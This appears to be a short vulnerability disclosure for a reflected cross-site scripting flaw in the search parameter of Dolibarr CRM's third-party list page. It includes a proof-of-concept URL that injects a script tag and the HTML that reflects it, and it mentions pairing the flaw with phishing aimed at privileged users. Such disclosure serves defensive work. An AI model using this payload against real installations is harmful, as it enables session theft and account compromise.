# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability
# Exploit Author: David Silveiro 
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro 
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/files/
# Date: Zero Day


Dolibarr ERP is a modern CRM to manage your company.It's opensource software, 
designed for small and medium companies, foundations and freelancers.

The issue lyes with insufficient sanitization when a user makes use of the search
function provided, and thus able to inject malicious JS to be used inhand with
a phishing attack direct towards higher previliged user.

POC:

http://127.0.0.1/societe/list.php?sall=<script>alert()<%2Fscript>

    <form name="formfilter" action="/societe/list.php" method="post">
        <input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input>
        <input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input>
        <input type="hidden" value="s.nom" name="sortfield"></input>
        <input type="hidden" value="ASC" name="sortorder"></input>

        Search criteria '

        <strong>
            <script>

                alert() <-------

            </script>
        </strong>

        ' into fields Third party name, Alias name, Custom?

        <table class="liste "></table>
    </form>